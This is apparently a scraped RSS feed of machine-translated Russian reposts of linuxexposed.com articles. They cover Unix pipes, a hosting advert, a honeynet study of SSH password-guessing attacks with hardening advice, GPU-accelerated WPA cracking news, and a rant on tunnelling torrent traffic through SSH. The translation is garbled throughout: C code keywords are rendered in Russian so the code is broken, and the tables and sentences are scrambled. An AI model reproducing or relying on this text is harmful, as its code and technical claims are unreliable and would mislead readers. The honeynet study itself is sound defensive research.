Первая эту проблему лучше всего осуществляются с помощью труб. Вы должны быть очень знакомы труб из пользовательской точки зрения, с момента, когда вы используете оболочку. Например:

  Найти /-INAME *. TXT | меньше  

   # включить   тап_п  ( )   ( INT CH =  0 ;  делать   ( сп = деЬспаг  ( ) ;   Е    (  "Got 0x% 0,2 X   п " , ч ) ; (# ))  , а   ( сп! =  0  ) ;  возвращение   0 (# ); )     

Родитель:

 # включить   тап_п (# ) ( )   (   FILE   * р =  NULL ; INT CH; р = (# )  popen    (  ". / ребенок" ,  "ш"  ) ;  если   ( == р  NULL  )   возвращение   1 ;  на   ( сп =  '' ; сп < 'г' , CH + + )   ( , если   ( сп! = fputc  ( ч, р )  )  перейти заблуждение, )  сп =  0 ; , если   ( сп! = fputc  ( ч, р )  )  перейти заблуждение, ошибаться:   pclose    ( р ) ;  возвращение  ч; )      Выход:  

 

linuxexposed.com
]]>
			http://fvsd.ru/2010/05/31/ispolzovanie-ipc-truby/feed/
		0
		
		
		
		http://fvsd.ru/2009/06/21/hosted-exchange-i-sharepoint-xosting-2/
		http://fvsd.ru/2009/06/21/hosted-exchange-i-sharepoint-xosting-2/#comments
		Sun, 21 Jun 2009 16:34:13 +0000
		
				
		
		
		
		

		http://fvsd.ru/2009/06/21/hosted-exchange-i-sharepoint-xosting-2/
		
			 Теперь в продаже! Secure  Hosted Exchange  и  Размещаемых Sharepoint  решений от нашего партнера ConsultPlanet. 

 ConsultPlanet является NR 1 управляемых услуг, которая обеспечивает безопасный хостинг решения: 
 (# ) Размещаемых Sharepoint – http://www.consultplanet.nl/producten/hosted_sharepoint/
  Hosted Exchange – http://www.consultplanet.nl/producten/email_services/managed_hosted_exchange.php  
 ( #)
linuxexposed.com
]]>
			http://fvsd.ru/2009/06/21/hosted-exchange-i-sharepoint-xosting-2/feed/
		0
		
		
		
		http://fvsd.ru/2009/06/21/hosted-exchange-i-sharepoint-xosting/
		http://fvsd.ru/2009/06/21/hosted-exchange-i-sharepoint-xosting/#comments
		Sat, 20 Jun 2009 21:26:34 +0000
		
				
		
		
		
		

		http://fvsd.ru/2009/06/21/hosted-exchange-i-sharepoint-xosting/
		
			 Теперь в продаже! Secure  Hosted Exchange  и  Размещаемых Sharepoint  решений от нашего партнера ConsultPlanet. 

 ConsultPlanet является NR 1 управляемых услуг, которая обеспечивает безопасный хостинг решения: 
 (# ) Размещаемых Sharepoint – http://www.consultplanet.nl/producten/hosted_sharepoint/
  Hosted Exchange – http://www.consultplanet.nl/producten/email_services/managed_hosted_exchange.php 
 ( #) 
 
linuxexposed.com
]]>
			http://fvsd.ru/2009/06/21/hosted-exchange-i-sharepoint-xosting/feed/
		0
		
		
		
		http://fvsd.ru/2009/06/20/analiz-vredonosnyx-ssh-login-popytki/
		http://fvsd.ru/2009/06/20/analiz-vredonosnyx-ssh-login-popytki/#comments
		Sat, 20 Jun 2009 12:20:28 +0000
		admin
				
		
		
		
		

		http://fvsd.ru/2009/06/20/analiz-vredonosnyx-ssh-login-popytki/
		
			  Злонамеренные SSH попытки входа были появляться в некоторых администраторов журналы в течение нескольких лет. Эта статья вновь использование honeypots анализ вредоносного SSH попытки войти и посмотреть, что можно узнать об этой деятельности. В статье  Затем даются рекомендации о том, как обеспечить свою систему от таких нападений.   
  

 
  
 Использование honeypots для научных исследований  В  Новая Зеландия Honeynet альянс  представляет собой научно-исследовательскую организацию и член Совета  Honeynet альянс , предназначенного для повышения безопасности компьютерных систем и сетей на изучении поведения, Тактика и инструменты черной шляпе хакеров с помощью honeypot технологии. Honeypots являются компьютерными системами, стоимость которых находится в их открытость для нападения, и компромисс, что позволяет исследователю проанализировать вредоносный деятельности в системе.
 Мы создали такую систему в Университете Виктории в Веллингтоне расследовать деятельность вредоносных что происходит в сети университетов в Новой Зеландии. Эта система была высокой взаимодействия honeypot, что злоумышленник может взаимодействовать как с любой другой системой в сети. Что касается нападающего, то, не должно быть никаких заметных различий между honeypot и других компьютерных систем. Однако, это тщательное наблюдение через Honeynet Альянс-Роо honeywall, что захватывает всего сетевого трафика, и вытекающие из honeypot. Кроме того, системные события, записанные на honeypot себя через свои объекты лесозаготовок. 
 В honeypot побежали сервер стандартной конфигурации  RedHat 9  с Secure Shell (SSH) сервера, на котором были доступны общественности через Интернет. SSH это программа, которая позволяет пользователю войти в другой компьютер по сети через зашифрованный канал. После того, как мы столкнулись вредоносные SSH попытки входа в предыдущих установок, мы настроили наш honeypot чтобы обеспечить дополнительный сбор данных. Мы пропатчен на SSH сервер записать пароль, а также имя учетной записи, которая была использована в попытке входа. В honeypot был доставлен в сети 11 июля 2006 года и принятых в автономном режиме на 1 августа 2006 года, после 22 полных дней. В honeypot напали несколько раз в течение этого периода, при попытках войти на SSH. Мы более внимательно взглянуть на данные, для определения тактики нападавших и вынести рекомендации по повышению безопасности вокруг SSH. 
 В дополнительной конфигурации из honeypot, которая действовала с 28 июня по 4 июля, мы  добавил Sebek модуль , что записи ключевых удар нападающего после того, как система была скомпрометирована. Мы настроены несколько учетных записей пользователей с широко используемых паролей. Через несколько дней, злоумышленник успешно скомпрометированы системы. Анализ этого нападения и последующего нападения, представленные в данном документе и предоставить нам дополнительную понять, каким образом опасный SSH логин попытки использовать для компромисса систем. 
 Анализ SSH Логин Попытки 
 В данном разделе анализируются данные захватили наш honeypot с 11 июля по 1 августа. Этот анализ основан исключительно на данных, системных журналов в honeypot, в частности, “сообщений” журнала. В ‘Сообщения’ журнал фиксирует аутентификации запросов к серверу SSH. Она фиксирует дату, время, IP-адрес, с которого вход попытку возникла в результате запроса (провал или успех), имя учетной записи и пароля, используемых для аутентификации запроса. Два ‘Сообщения’ образец журнала записи приводятся ниже.

 Июля  13   09 :  37 :  59  Баста sshd  [  22308  ] : PW-ПОПЫТКА: Фриц июль  13   09 :  37 :  59  Баста sshd ( #) [  22308  ] : Ошибка пароля  на  корень из  10,0   .160   .14  порт  39529  ssh2 июля  13   09 :  38 :  02  Баста sshd  [  22310  ] : Незаконное fatacunike пользователя с  10,0   .160   .14  июля  13   09 :  38 :  02  Баста sshd  [  22310  ]  : PW-ПОПЫТКА: fatacunike июля  13   09 :  38 :  02  Баста sshd  [  22310  ] : Ошибка пароля  на  незаконных пользователей fatacunike с  10,0   .160   .14  порт (# ) 40444  ssh2   
 Во-первых, мы проанализировали логины, которые были использованы на попытки входа. За образец периода насчитывалось 2741 уникальных учетных записей, начиная от обычных имен, систему учетных записей, и общий счет на короткий алфавитном строк захвачен системой логгер. Из них 15 учетных записей, используемых наиболее часто приводятся в таблице 1. Эта таблица показывает, что приходится, как правило, существуют в системе (корень, MySQL), счетов, которые могут существовать в системе (гостевые, испытания), а также общих имен (Пол). Потом На рисунке 1 показано распределение действительных и недействительных учетных записей, которые были использованы. 
 Неудивительно, что недействительный счет имен используются далеко превосходят действительных имен учетных записей. Однако мы отмечаем, что 96.30% всех по умолчанию учетной записи имен, которые существуют на honeypot, использовались во время нападения. 


 Имя учетной записи
 Количество попыток входа
 корень 
 1049
 Admin 
 97
 Тест 
 (# ) 87

 40

 31

 Инфо
 30 
 Oracle
 27 
 Postgres
 (# )

 Пауль
 25
 интернет
 24
 пользователь
 тестер

 PGSQL



   
   (# ) 

 
 

 
 


 
 Гость 


 
 MySQL 


 (# ) 
 


 
 


 
 (# ) 27 


 тестирование 
 27 


 для веб-мастеров 
 27 

 
 

 
 

 (# ) 23 
 


 22 
 


 21 
 (# ) 


 Таблица 1. Топ 15 учетных записей между 2741 попыток. 
 



  Рисунок 1. Номер счета именами, как существующих, так и недействительными.    
 Далее, мы смотрели на паролей, используемых в попытках входа. Нападавшие пытались целый ряд паролей, причем большинство из учетных записей. В общей сложности в ходе нашего анализа, они попытались получить доступ к различным счетам 2741 и 3649 используются разные пароли. Не все пароли были использованы все счета. Пароли варьировались от учетной имена учетных записей с числом последовательностей, числовых последовательностей и клавиатуры последовательностей (например, ‘QWERTY’). Были еще несколько сложных паролей, используемых при, казалось бы, случайные буквы и числа последовательностей или замена паролей (например, r00t или C @ T @ Lin).


 Таблица 2 показывает 15 пароли, используемые в злоумышленных попыток входа. 
     
 Пароль 

 Количество попыток входа

 331
 Пароль 
 106
 Admin 
 47
 Тест 
 46
 111111 
 36
 12345 
 34
 администратор 
 28
 Linux 
 23
 Корень 
 22
 test123 
 22
 1234 
 21
 123 
 20
 MySQL 
 19
 Apache 
 18
 Master 
 18
 Тогда мы проверили, кто атаковал honeypot и какую стратегию эти нападавшие использовали. Были 23 уникальных IP-адресов, участвующих в попытках входа. Нападавшие были более или менее стойкими в своих попытках получить доступ к системе, как показано в таблице 3. Десять из источников попытался менее 50 комбинаций, а затем сдался. Пять пытались труднее около 170 попыток входа, и восемь старались даже труднее до 1450 попыток входа. Рисунок 2 показывает разбивка попытки входа на исходный адрес. 



  123456  
   

 
 

 
 

 
 

 
 

 
 

 
 

 
 

 
 

 
 

 
 

 
 

 
 

 
 

 
 


 Таблица 2. Топ 15 паролей покушение. 
 



     Количество Логин Попытки 

 уникальных IP-адресов

 ( #)
 5

 ( #)> 200
 8 
 Таблица 3. Частотный диапазон от попыток входа.



 <50   10 
   50 <= X <= 200 


 
 


 
 


 
 



 Рисунок 2. Ошибка входа попытки источника ИС. 
    Более пристальный взгляд на нападающих показывает более подробную информацию о том, как перерыв в попытки имели место. Нападавшие пытались одно имя учетной записи на попытки войти с паролем, в основном соответствует имени учетной записи (например, контрольно-испытательных) и перешла к следующему имя учетной записи. Другие нападающие отличаются в своей стратегии. В среднем, злоумышленник попытался 10.0.179.148 пять пароли, прежде чем в другой аккаунт. Пароли, используемые в этом нападении схема состоит из числовых последовательностей или имя учетной записи с сочетанием различных числовых последовательностей (например, Admin / Admin, admin/admin1, admin/admin123, admin/111111). Злоумышленник на 10.0.105.52 сосредоточено на коренных счету, все попытки, но одна из его попыток входа (гость) в том, что имя учетной записи. Пароли варьировались от общего пароля для случайных чисел и последовательностей символов (например, корень /!@#, root/123abc, корень / по умолчанию).  
 Несколько нападавших выставлены поведением, которое может обойти вниманием один IDS, ограничивая их атаки лишь несколько попыток. Атаки стали более серьезными различных степеней. Во-первых, количество попыток входа увеличилась, во-вторых, попытки войти в аккаунт увеличилось, и, наконец, мы увидели концентрации попытки входа на особое внимание, как и корень. Как и попытки стали более серьезными, обнаружения злоумышленника станет более вероятным, если система обнаружения были развернуты. Можно было бы думать, что злоумышленник успех ставка увеличится с более попыток и последующего увеличения опасности обнаружения, но мы не можем подтвердить это, как наши данные не включают обследование имя / пароль комбинаций существующих систем.


 В попытке получил дополнительную информацию о методологии и инструменты нападавшие использовали, мы рассмотрели отклонение и средний период времени между каждой попытке входа на исходный IP. Мы предположили, что если инструмент был использован в ходе этого нападения, мы можем легко определить ее использования, изучив эти ценности. Небольшой разрыв между попытками логина и низкая разница будет означать использование инструмента, а больше нелегальных пробелов бы указать злоумышленник был фактически совершают попытки входа в лицо. Рисунке 3 приведены эти данные. 
     
 Диаграмма 3. Средний период между попытками входа (секунд ).

 в пятерку преступников, которые могут использовать средства в своих нападений, из-за огромного числа попыток, показывают в среднем период между попытками от 2 до 4 секунд с помощью стандартного отклонения, что составляет от 0,45 до 1,39 секунд. С другой стороны, мы видим, что злоумышленник на 10.0.192.15 в среднем период между попытками примерно 7 секунд, а стандартное отклонение 2.36 секунд – с указанием лица, возможно, совершили попытки входа. Тем не менее, эти данные не поддерживает четкое указание инструмент использования как многие нападения последовательности относятся к средним или даже ниже значений начала нападения преступник последовательностей. Одним из возможных объяснений может быть то, что нападения были инструменты, используемые в большинстве нападения последовательности, и мы только латентность сети наблюдений.

 По сравнению с выше попытки, сильный показатель использования инструмента выявляется экспертизой по счету имена и пароли, используемые в нападениях из 10.0.255.81 и 10.0.242.26. Несмотря на то, что IP-адреса проживали в различных физических сетях и нападения произошли 4 дня друг от друга, имя учетной записи и пароля комбинации был идентичным.


 “Успешные” вредоносные попытки входа SSH 
 в предыдущем разделе, мы проанализировали данные захватили неудачного вредоносные попытки входа SSH. Эти данные дают нам некоторое представление о том, как действовать нападавших, но оставляет нерешенными многие вопросы. Одним из таких вопросов является ли или нет инструментов, используемых в этих нападениях.  2 июля злоумышленнику успешно подрывает honeypot путем угадывания действительное имя пользователя и пароль по SSH. Данные, захваченные в ходе этого инцидента показало, ответы на эти вопросы открытыми.   Прежде всего, мы рассмотрели действия злоумышленника после успешного компромисса в honeypot. После того, как действительное имя / пароль был определен, злоумышленник вход в honeypot через SSH и приступил к скачать SSH сканер инструмент. Этот инструмент более подробно описаны в следующем разделе, но теперь он будет кратко в качестве инструмента, который позволяет его пользователям определить и другие компромиссные SSH серверы через попытки угадать пароль. Установленная инструмент сразу же был использован для сканирования сети класса B с нашей honeypot. Из-за ограничений на исходящие сетевые подключения обеспечивается в Роо honeywall года SSH сканера не было выявлено каких-либо SSH серверы.  
 После начального сканирования, злоумышленник провел скачать и установить IRC Bot. Боты IRC являются теми инструментами, которые могут контролировать скомпрометированы системы удаленно через IRC чат-каналов, что скомпрометировано система установлена для прослушивания. Использование IRC контроль скомпрометирована система является гораздо более скрытое, чем непосредственно с помощью SSH, так как злоумышленник не имеет прямого входа в систему больше. Кроме того, она позволяет злоумышленнику контролировать несколько таких систем, также известные как зомби, в то же время.

 Разговоры в IRC канала показали, что Зомби были использованы для проверки сети класса B с SSH сканера так же, как тот, который был загружен на нашем honeypot. В течение пары часов, четыре класса B сети были отсканированы с SSH сканером из различных IRC Боты, выявляя тысячи SSH серверы. А сканирование занимает примерно 700 секунд. Кроме того, мы стали свидетелями обмена счет имя / пароль в списке 160324 уникальные имя пользователя и пароль комбинаций. Структура этих учетных записей и паролей были очень похожи на те, возникающие во время нападения на наши honeypot системы, но более обширна.

 Анализ резюме

 Что мы можем сделать из этих данных, захваченные нашей honeypot? SSH является способом получить доступ к компьютеру по сети в защищенном, зашифрованном виде, и получила широкое признание. Однако, несмотря на его хорошую репутацию в том, что касается безопасности, Есть еще угрозы, связанные с операционной SSH на машине. Пароль угадать явно одна из таких угроз, как мы показали в этом документе. Тот факт, что SSH сервер и доступных из Интернета привлек 23 последовательностей нападения уникальные IP-адреса источника, с 6899 логин попытки нашей honeypot всего 22 дней. Это составляет примерно одну атаку, и около 300 попыток входа в день в среднем. Некоторые нападавшие очень серьезно относимся к исполняющей нападения, исполнителей сотни попыток входа в сессию. 
 Сканер съемки показали, что очень мощный инструмент используется. Они очень гибкие и могут использовать учетную запись настроить имя / пароль списки для нападения. Если злоумышленник хотел атаковать конкретного домена, они могли бы потенциально урожай имен учетных записей по социальной инженерии, а затем объединить эти счета имен стандартных паролей, которые будут использоваться во время нападения. Наблюдая IRC Bot канала, мы увидели, что нападавшие сканирования инструментов в сочетании с IRC Bot технологии выполнять сканирование с помощью Zombies (скомпрометированы нападавшими систем управления с помощью дистанционного канал). Наши тесты показали, что SSH пароль сканер может сканировать сети класса B на 700 секунд.

 В сочетании с армией роботов IRC, злоумышленник только нужды 525 Zombies сканировать весь IP4 сегодняшних общественных Интернет всего за один день. Если у вас есть общедоступный SSH сервер, то вы скорее всего, быть направлены на один из этих актов.

 Рекомендации
 Есть несколько простых способов защиты от этих нападений. Наиболее очевидный способ заключается в том, чтобы отключить демона службы, которая во многих системах установлена по умолчанию. Если компьютер работает в качестве системы настольной машине, то, скорее всего не нужно для удаленного доступа через SSH для входа в компьютер. Если это не вариант, Есть много других вариантов. 
 Используйте / ETC / hosts.allow и / ETC / hosts.deny файлы найдены на большинстве Unix и Linux системой для ограничения доступа демона конкретных хостов. 
 Установить брандмауэр для ограничения доступа к серверу SSH только назначенные машины и сети. Это работает особенно хорошо, если администрация машины из внутренней сети требуется удаленный доступ к этой машине. 
 Ограничить SSH-сервер для аутентификации только определенных пользователей или групп. 
 Переместите прослушивания порт на SSH сервер с 22 на некоторые другие неиспользованные порта. Хотя это не будет препятствовать нападавшим с подключением к серверу и начать угадывания пароля, это позволит значительно снизить вероятность нахождения вашего демона SSH, а нападающие используют стандартные SSH клиенты и средства нападения, которые берут на себя SSH сервер работает на стандартный порт 22. 
 Использовать альтернативный метод аутентификации, кроме простых паролей. Подробнее об этом ниже. Если это не вариант, убедитесь, что сильная, сложных паролей или фразы используется. 
 SSH обеспечивает альтернативный метод аутентификации, который успешно сокращает угадывания пароля нападений. Этот метод проверки подлинности на основе криптографических ключей, или так называемых закрытых ключей и открытого ключа. Открытый ключ размещается на сервере, и выступает в качестве шлюза для пользовательского доступа к вашей учетной записи. Этот замок можно открыть только с соответствующего частного ключа. После того, как вы этот ключ, вы получаете доступ. Пароль угадать атак будут неудачными, как нападавшие не может угадать или создать такой частный ключ. Все современные SSH серверы настроены по умолчанию, чтобы поддержать этот метод аутентификации. Тем не менее, они обычно не на основе пароля авторизации в случае неправильного частный ключ при условии, открывая двери для нападений угадать пароль еще раз. Сервер должен быть настроен, а согласиться на основе ключей аутентификации
, только 
 для смягчения последствий этой стратегии будет успешным.
 Настройка SSH с криптографическими ключами, очень проста и занимает всего несколько минут. Предыдущая статья написана Брайаном Hatch иметь имя 
 SSH пользователей Тождества
 для безопасного доступа между индивидуальным пользователем и SSH сервер. Для получения дополнительной информации о принимающих ключевые порожденных каждом сервере, 
 хостом SSH ключ защиты
 статьи может быть также в использовании. Затем, если SSH crytpo ключи в использовании, читатель может потребоваться еще один пример 
 SSH и SSH-агент
 сделать это проще и быстрее для того, чтобы войти с помощью SSH. 

 В некоторых случаях пароль подлинности на основе или доступ к SSH-сервер не может быть отключена. В тех случаях, другие меры должны быть приняты. Мы видели, что нападающие угадать счет и иметь хорошие знания существующей системы счетов и счетов можно часто найти в компьютерных системах. Если атакующий имеет возможность угадать имя учетной записи, которая существует в системе – по нашим honeypot этом была достигнута на 96.30% по умолчанию учетных записей в системе RedHat honeypot – злоумышленник уже одной ногой в дверь. Таким образом, мы рекомендуем не использовать легко guessable счета имена, такие, как общие имена. Не используйте ‘Питер’, ‘Ян’ или ‘Марка’ а, скорее, создать учетную запись имен, содержащих сочетания имени и фамилии, например, “seifer_chr”. Это, как правило, может быть достигнуто за счет администратор, который контролирует назначение учетных записей.   Кроме того, мы видим, что “корень счета является наиболее часто используется имя учетной записи для атаки, как это обычно существует на компьютерные системы. Мы рекомендуем, чтобы удаленный доступ к этому счету просто отключен. Вместо этого администратор должен “Су” (суперпользователя) получить доступ к этому счету первым через учетную запись обычного пользователя.
  Нападающие часто пытались угадать счета, которые существуют в большинстве систем по умолчанию, например, FTP и MySQL. Доступ к корпусу может быть получена только по этим счетам, если оболочка, связанные с этой учетной записи. Для тех счетов, как FTP или MySQL, что существуют просто для запуска услуги на машине, без скорлупы, необходимо и должны быть отключены, фактически запрет удаленного доступа с этих счетов с помощью SSH.   В дополнение к учетной записи имен, которые не могут быть, догадались, важно, чтобы пользователи пароли сильным. Мы видели, что пароли, используемые в нападениях нередко совпадают имена счет или счет, имена с номером последовательности. Мы предполагаем, что нападавшие выбрать эти пароли, поскольку они являются наиболее “успешных” в злоумышленных попыток входа. Это означает, что по крайней мере, некоторые пользователи устанавливают свои пароли к этим легко guessable строк. Единственный способ администратор системы может запретить пользователям выбирать такие пароли, установив различные инструменты, например,  + пароль , что силы пользователям выбирать надежные пароли.  
 Нападающие использовании инструмент для выполнения угадывания пароля и логина попытки, как, например, захваченного сканера,
 QT 
 и
 55hb 
. Однако, несмотря на эти инструменты, минимальное среднее время попытки входа было около двух секунд, из-за искусственной задержки на неудачных попытках входа в который был включен в SSH-сервера, а также различные сетевые задержки. Хотя это обеспечивает защиту от атаки грубой силы, всего несколько попыток, и угадать, которые необходимы на слабых внимание имена и пароли для них будет поставлена под угрозу. Меры безопасности, описанные выше, должны быть установлены в целях безопасности, на практике ширина и глубина.

 Будущая работа
 Наш анализ основывается на данных, захватили наш honeypot. Мы не можем определить, насколько успешно эти атаки против систем, которые можно найти в Интернете. Мы бы сравнить имя учетной записи и пароля комбинации, используемые в нападениях на счет имя / пароль комбинаций, которые существуют на реальных систем с целью определения успеха. Кроме того, мы предложили движущихся прослушивания порт на SSH сервер на некоторые другие неиспользованные порта. Нам необходимо создать систему с такой конфигурацией для оценки ее эффективности.  Об авторе  
 Кристиан Зайферт  является членом Новой Зеландии Honeynet альянса.    
 

linuxexposed.com
]]>
			http://fvsd.ru/2009/06/20/analiz-vredonosnyx-ssh-login-popytki/feed/
		1
		
		
		
		http://fvsd.ru/2009/06/20/kreking-wpa-i-wpa2-paroli/
		http://fvsd.ru/2009/06/20/kreking-wpa-i-wpa2-paroli/#comments
		Sat, 20 Jun 2009 09:43:53 +0000
		admin
				
		
		
		

		http://fvsd.ru/2009/06/20/kreking-wpa-i-wpa2-paroli/
		
			Распространен в Elcomsoft Password Recovery (EDPR) инструмент, который можно взломать WPA и WPA2 пароли быстрее вызвало беспокойство среди пользователей и специалистов. В Великобритании Защищенного вычислительным журнал цитирует Глобальной Защищенного Systems, поставщик  услуг безопасности, заявил, что обеспечение WLAN исключительно с WPA и WPA2 теперь уже не достаточно: дополнительная защита с VPN шифрование является необходимой.
 
  
 Elcomsoft объявил в начале недели, что EDPR теперь поддерживает несколько графических чипов карту для восстановления паролей по WLANs. Это утверждал, чтобы сделать процесс крекинга до 100 раз быстрее, чем с обычной процессора. Около года назад, показало Elcomsoft с версии 2.0, как EDPR GeForce 8-серии карт могут быть использованы для взломать пароли Windows NTLM до 25 раз быстрее. Теперь, похоже, NVIDIA многолетних GPU поддержка позволит WPA и WPA2 пароли как “рекуперированная” быстрее, тоже. 
 В частности, NVIDIA в GeForce GTX280, причем до 240 Шейдерной ALUS и до одного гигабайта оперативной памяти, дает огромный стимул для работы. В среднем ноутбук с NVIDIA GeForce 8800M или 9800M, WPA пароли могут треснувший от 10 до 15 раз быстрее, чем без поддержки GPU. Если два или более GTX-280 карт использовать этот процесс, судя по сообщениям, в 100 раз быстрее. Кроме того, WPA пароли, EDPR способен выработать пароли для Microsoft Office, Adobe Acrobat, PGP и Lotus Notes, а также Windows и Unix пароли. 
 Если Elcomsoft инструмент действительно представляет собой угрозу для WLANs с помощью WPA еще предстоит выяснить. Это нападение представляет собой простой грубой силы один, используя вычислительные мощности многочисленных GPUs чтобы ускорить этот процесс. Если надежные пароли используются – то есть, длинный и содержащий непредсказуемой последовательности символов – тогда это нападение может еще немало времени, даже в 100 раз превышает скорость. Самый быстрый взлома паролей из этой системы потребует кластер мощных рабочих станций с несколькими парами высокого конец двойной процессор графической карты, рабочие, возможно, за несколько дней, так что это не нападение, что люди будут запуск с КПК или смартфона, ни даже автомобиле, припаркованном на улице. Серьезная атака на хорошо настройки WLAN потребует захвата значительный кусок сетевого трафика с снифер, затем оно вне для обработки. К тому времени, когда безопасность была нарушена, а плотно обеспеченных сети будет изменен ключи в любом случае. 
 Слабые пароли, с другой стороны, представляют собой проблему, даже без EDPR. Кроме того, TKIP часто используемый на корпоративных сетях для шифрования, а это означает, что сеть ключевых постоянно меняется каждые несколько килобайт в ходе сессии. Elcomsoft не сообщил ли его новый инструмент может также быстро нападения таких сетей.  
linuxexposed.com
]]>
			http://fvsd.ru/2009/06/20/kreking-wpa-i-wpa2-paroli/feed/
		0
		
		
		
		http://fvsd.ru/2009/06/20/torrenty-i-ssh-tunnel/
		http://fvsd.ru/2009/06/20/torrenty-i-ssh-tunnel/#comments
		Sat, 20 Jun 2009 05:25:40 +0000
		admin
				
		
		

		http://fvsd.ru/2009/06/20/torrenty-i-ssh-tunnel/
		
			   После распада Napster, в таких местах, как donkax и единственный оригинальный HTML suprnova, бренд новой эры файл обмена было на человечество. Переход из регулярного P2P сети BitTorrent, как-то вдоль линий изменение избили Dodge на блестящей новой Ferrari (блондинка  входит в комплект поставки). Молния быстро и ошибок передачи премиум содержание, которое ранее принял возрасте получать и распространять теперь вытекает, как драгоценные пряности filesharing всей галактике. К счастью, император был слишком занят, чтобы заметить, когда они насиловали этих бедных несколько пионеров позади “Napster, как” P2P сетей и FTP и свалки “хозяев”, что вся партия, помимо регулярного обмена файлами в его традиционном смысле, что происходит. Спиральный из-под контроля новенькой полностью ветром культуры совместного использования файлов является поиск путей ее в любой другой способ общества. Это уже не то лишь немногие решили участвовать в таком случае действительно занимает прочное место в жизни лиц, в среднем, где-то между тостер, телевизор.   

 
 (# )  
  Не удивительно “отрасль” имеет мало хорошего сказать нечто такое, что нарушает свои собственные очень священные места в нашей жизни. Человек насколько обществе тенденции, то, являются удивительно глупых существ – в то время как постепенно развивается в один слой сознания и информированности, мы полностью остановлен в ряде направлений, которые могут предложить большие возможности для улучшения человеческой расы, и в некоторой степени, прогресс, как мы его знаем . Анти P2P кампании нынешнего напомнить священных крестовых походов, причем заметна разница, что не только некоторые врага сражались-то там, но и своим лояльным предметы рассматриваются как враг. Так что, хотя многие народы этих дней утверждают, что демократические (который для вот этого аргумента, как предполагается, будет верхней в эволюции ссылке), в реальности – во многих аспектах жизни, мы на самом деле лишь немного из темных веков. Много потенциально плохие вещи начали с 2 факторами “… это лидеры в стране, кто определяет политику, и это всегда является простым делом вытащить людей вместе, будь то демократия, или фашистской диктатуры, или парламент, или коммунистические диктатуры. “(из архивов Нюрнбергского судебного разбирательства), либо в корпоративном мире современного бизнеса, который по моему мнению, отражает то, что мир много будет использоваться как и в прошлом веке. Технологический прогресс просто развивается быстрее, чем общество может адаптироваться, поэтому вместо развивается быстрыми темпами, на Есть те немногие большинство влияния, которое, как правило, по одной причине или другой проведении большинства назад, получив их эксплуатации в наиболее возможной степени вдоль пути курс.  
 В индустрии устремились в новое боя гораздо спорным причинам, некоторые события произошли также в центре Интернет – провайдеры землю, что есть. Bittorrent явлений выявили еще одно слабое звено в наших демократий, [которое в теории должно самоуправления настроить такие препятствия], события с растущим движением были далеки от перспективным, поскольку немногим более десяти лет, отрасль продали широкополосного к массам без этих масс, фактически используя их потенциал широкополосных на макс. А теперь несколько гипотетических filesharing движения преобразована в весьма реальные цифры, которые не выглядеть на все отрасли, так как инвестиции в улучшение технологий для поддержки растущего спроса будет весьма вероятно передаче некоторых корпоративных королевской осел ногами – он просто не В интересах максимального дохода с учетом того, что решительные меры имеются в наличии. Так что же делать эту отрасль? Ну их, посмотрев вокруг, и то, что они уже были найдены товарищ царь боевых святой крестовый поход и сжигание ведьм один за другим, так что, естественно, “Почему мы должны быть какие-либо иному, если масса не жалко пару сжигали ведьм слишком И rdquo ; раза массу новых технологий сжигания и мы его, – все виды трафика P2P ограничений из провайдеров. 

 [P2P броня]   
 Есть ряд головных к P2P netizens – вопросы конфиденциальности и доступности в P2P услуги относятся к числу тех немногих первыми. Конфиденциальность является проблемой для простой причине, что независимо от того, насколько распространено в сети передачи, в конце загрузки / скачать узел всегда будет видна с заинтересованными сторонами. Тогда возникает проблема с теми ресурсами, перевозящих пользователю идентифицировать журналы, которые могут найти свой путь к “другой стороне”. Наконец существует потенциальная проблема с утечками информации в прерывистому узлы между источником и пунктом назначения в P2P трафик. Наличие в P2P услуга очень многое сводится к P2P трафика то подделаны, прежде чем он фактически достигает P2P сети в любом направлении. 
 Если мышление скрывая своего IP от остального мира, несомненно, доверенными лицами или своего рода мода на поп картина. Традиционные носки прокси концепции заботится об этой проблеме в большинстве мере движения, если это рассматривать как осуществляется обмен с клиентом на прокси-сервер, а затем в другую сторону, и наоборот, поэтому реальный IP не взаимодействовать с другой стороной напрямую, а через дополнительный уровень коммуникации. Это было время широко принятые в число “анонимных” услуги бесплатной сети Tor (которые никогда не должны использоваться для Торренты!) Для коммерческих BTGuard как услуги. Существует, однако, проблема с последним – этот вид услуг, безусловно, хорошо для общественного отслеживания ресурсов, но она не дает способ подключения для частных трекеров. Местами это происходит потому, что частные трекеры потребуется вам для входа на сайт, то они позволяют IP, с которого возникла вход для обмена данными с другими пользователями по сети. Еще одной проблемной точкой этого подхода такова, что коммуникации между клиентом и сервис очень читабельным и открыты для любых фальсификации. Так что, хотя фактически скрывая ваш IP, вы можете попасть в ловушку, имеющих оборот подделаны, прежде чем оно достигнет доверенности. Большинство современных клиентов как utorrent, Azureus и потоп имеют возможность полностью шифровать входящий и исходящий трафик. Так что это хороший дополнительный шаг в создании труднее изменять трафика [не зашифрованного трафика - DNS-запросы, а также обмена информации браузера с множеством торрент происхождения]. 
 Более эффективный механизм, является еще одним слоем шифрование, предлагают такие услуги, как Relaks или Torrentfreedom, там вы в основном создать VPN-соединения, которые все туннели трафика на их серверах, а оттуда она путешествует по сети Интернет ” как есть “вне туннеля. Для справки – некоторые провайдеры специально не разрешают VPN соединения со своими сетями, (там, где это официально запрещена TOS / AUP) линия довольно много падает мгновенно, как только VPN туннель был создан. Наконец P2P netizens имеете возможность запуска безопасного подключения к виртуальной частной арендовал (выделенный) сервер. 
 Конечно физическим сервером будет делать гораздо лучше по сравнению с виртуального изображения, но затраты вступит в озабоченность тем виртуальный вариант значительно дешевле (менее 10 $ в месяц, в некоторых случаях). Виртуализация поставляется по цене меньшей, имеющих ресурсы на деньги, поэтому все виды windblowz установки в значительной степени из этой темы так же, как графический интерфейс рабочего стола эффект богатыми среди современных дистрибутивов Linux, в связи с CPU / RAM ограничений. Использование ресурсов в буквальном смысле должно быть сведено к минимуму, концентрации на том, достаточно ресурсов, поставляемых на услуги, которые будут оказывать помощь в P2P. 
 Такие виртуальные сервера необходимо поставок шифрования, а также выступать в качестве веб-прокси и носки. Как правило, из окна установки VPS / VDS провайдеров прийти значительно раздели и оптимизированы предложить очень минимально возможной установки. Для примера вот убунту было использовано, чтобы сервер с оригинальным установленной базой занимающая около 240mb в пространства. Из окна службы удаленно доступны для дальнейшей установки SSH, так что это, как такое сервер будет настроен. Есть ряд SSH клиенты там, ходят слухи, что она шпатлевка пород, но не стесняйтесь использовать любые хотите. Установление соединения с сервером SSH также легко и Есть много Tutorials там о том, как это сделать. 
 [Setup]   
